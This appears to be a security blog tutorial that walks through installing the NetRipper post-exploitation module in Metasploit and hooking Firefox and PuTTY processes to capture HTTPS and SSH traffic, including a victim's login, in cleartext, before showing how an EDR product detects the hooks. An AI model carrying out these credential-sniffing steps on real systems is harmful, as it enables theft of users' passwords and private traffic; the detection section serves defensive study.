NetRipper is a post exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption related functions from a low privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

Basically, this can allow the attacker to sniff HTTPS and SSH traffic from his target in clear-text. This can help the attacker acquire additional information, such as usernames and passwords from the user once he authenticates to web applications (over HTTPS) or network devices (over SSH).

In this example we will see how to perform this attack using NetRipper (assuming that the attacker already has a meterpreter shell), and then see how an EDR tool such as RSA NetWitness Endpoint can help in detecting such attacks.

 

We are using:
– Kali Linux as the Attacker’s machine
– Windows 7 with McAfee Antivirus as the victim (the same technique would work on Windows 10 as well)

 

Installation of NetRipper for Metasploit on Kali

Run the following commands on the Kali box to install NetRipper and make it available within Metasploit.

cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb

mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper

g++ -Wall netripper.cpp -o netripper

cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper

cd ../Release

cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll‍‍‍‍‍‍

 

Launch the Attack

We will assume that the attacker already has a meterpreter shell.

01-meterpreter shell

 

The attacker can connect to the available session using “sessions -i 1” and he can then list running processes using “ps”

02-ps processes

From here he can identify that firefox.exe and putty.exe are currently running.

 

The attacker will now decide to use NetRipper to sniff network traffic from firefox in clear-text, even when HTTPS is used.
He will load NetRipper by using the following command: use post/windows/gather/netripper
He can list the options needed with: show options

03-use netripper

 

The attacker needs to:
– set the session ID to use (session 1 from the list of available sessions): set SESSION 1
– set the process names or process IDs he wants to hook to: set PROCESSNAMES firefox.exe,putty.exe

He can then launch the exploit using: exploit

04-exploit

 

Now that the hooks are set, NetRipper will sniff the traffic for those processes in clear-text and save the content on the victim’s machine, by default under the current user’s TEMP folder (can be changed with the DATAPATH option).

07-list folder

 

The victim will now try to authenticate to a web application over HTTPS. In this example we will use GMail, but it could be anything.

06-gmail-password.PNG

 

Now the attacker will read the content of the firefox.exe_PR_Write.txt file. Even though the victim is using HTTPS, the attacker is able to see both the username (someone@gmail.com) and the password (password123) of the victim in clear-text.

08-output.PNG

The same could be done with Chrome, Putty, SecureCRT, WinSCP, Lync, Outlook …
It is also not limited to login information, but to anything sent or received by the process.

 

 

Detection Using an EDR Solution

Now that we have seen how easily an attacker can sniff encrypted traffic from the user via process hooking, bypassing the victim’s antivirus, we will now see how to detect it using an EDR solution such as RSA NetWitness Endpoint.

In the below screenshot, we can see how RSA NWE detects:
– the hooked process (firefox.exe)
– the hooked module names
– the hooked symbols
– an elevated IIOC Score
– the list IIOCs that have been triggered

08-ECAT-IIOC.PNG

In addition, by analyzing the module and doing static analysis, we can see references to NetRipper and to the files and folders used by the tool.

09-ECAT-Analyze.PNG